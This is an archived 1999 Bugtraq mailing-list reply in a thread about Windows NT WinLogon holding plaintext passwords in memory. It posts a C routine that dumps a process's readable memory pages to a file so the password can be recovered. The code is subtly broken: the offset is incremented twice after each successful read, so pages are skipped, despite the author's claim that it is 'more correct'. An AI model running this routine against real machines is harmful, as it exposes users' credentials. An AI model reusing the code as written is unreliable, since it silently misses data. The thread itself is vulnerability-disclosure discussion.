Actually there is a large bug in the code (well - it works just as well but
thousands of times faster and is more correct):
There is no reason to look beyond the application min and max address range
and no reason to read in anything other then page sizes (since a
VirtualAlloc will always round to at least the next largest page size).
This was how I should have written it to begin with but I got lazy :)
DWORD DumpMemory(HANDLE hProc, LPSTR szPath)
{
LPSTR lpOffset = 0;
LPSTR lpBuf = 0;
DWORD dwRead = 0;
BOOL bLastRead = FALSE;
DWORD dwDumpedBytes = 0;
SYSTEM_INFO si = {0};
FILE *f = 0;
f = fopen(szPath, "wb");
if(f)
{
GetSystemInfo(&si);
lpBuf = (LPSTR)malloc(si.dwPageSize + 1);
for(lpOffset = si.lpMinimumApplicationAddress;
(void*)lpOffset <= si.lpMaximumApplicationAddress;
lpOffset += si.dwPageSize)
{
if(ReadProcessMemory( hProc,
lpOffset,
lpBuf,
si.dwPageSize,
&dwRead))
{
if(bLastRead)
{
fwrite(lpBuf, 1, dwRead, f);
}
else
{
fprintf(f, "\noffset %lx\n", lpOffset);
fwrite(lpBuf, 1, dwRead, f);
bLastRead = TRUE;
}
dwDumpedBytes += dwRead;
lpOffset += si.dwPageSize;
}
else
{
bLastRead = FALSE;
}
}
fclose(f);
}
else
{
fprintf(stderr, "Unable to open %s", szPath);
}
return dwDumpedBytes;
}
-----Original Message-----
From: Jorge_Miguel_Pintoat_private
[mailto:Jorge_Miguel_Pintoat_private]
Sent: Thursday, December 16, 1999 9:48 AM
To: rhorvickat_private
Cc: BUGTRAQat_private
Subject: RE: NT WinLogon VM contains plaintext password visible in admin
m ode
I am sorry, but only read this today...
There is small bug in this code...
<! LPSTR lpOffset = (void*)1;
!> LPSTR lpOffset = (LPSTR)1;
This also doesn't work on Windows 2000 Professional, SRV and Adv Srv.
Greetings,
J.
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:21:50 PDT